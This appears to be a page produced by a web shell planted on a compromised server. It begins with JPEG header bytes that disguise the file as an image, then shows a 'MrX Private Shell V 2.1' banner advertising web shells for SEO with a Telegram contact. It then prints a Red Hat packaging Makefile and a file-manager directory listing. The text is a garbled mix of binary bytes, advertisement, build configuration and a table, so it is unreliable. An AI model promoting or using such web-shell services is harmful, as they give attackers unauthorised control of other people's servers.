����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# variables that can be overrided by ~/.rhpkg.mk or $(TOPDIR)/.rhpkg.mk
#
# Command to invoke rhpkg
ifeq ("$(DISTRO)", "fedora")
RHPKG_BIN:=fedpkg
else ifeq ("$(DISTRO)", "centos")
RHPKG_BIN:=centpkg
else
RHPKG_BIN:=rhpkg
endif
# Kerberos username for pkgs.devel.redhat.com
ifndef RHSELFTESTDATA
RHDISTGIT_USER:="$(shell whoami)"
else
RHDISTGIT_USER:="shadowman"
endif
# Local dist-git _clean_ clone. To be used when updating dist-git
#RHDISTGIT_CACHE:=
# Temporary directory to clone the dist-git repo to. Change this if you
# have a faster storage
RHDISTGIT_TMP?=/tmp
# load configuration, starting with home directory then local
ifeq ("$(RHDISTGIT_CACHE)", "")
ifneq ("$(wildcard ${HOME}/.rhpkg.mk)", "")
include ${HOME}/.rhpkg.mk
endif
ifneq ("$(wildcard $(TOPDIR)/.rhpkg.mk)", "")
include $(TOPDIR)/.rhpkg.mk
endif
endif
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| debug | Folder | 0755 |
|
|
| docs | Folder | 0755 |
|
|
| koji | Folder | 0755 |
|
|
| Makefile | File | 35.97 KB | 0644 |
|
| Makefile.cross | File | 3.72 KB | 0644 |
|
| Makefile.rhpkg | File | 843 B | 0644 |
|
| Makefile.variables | File | 5.4 KB | 0644 |
|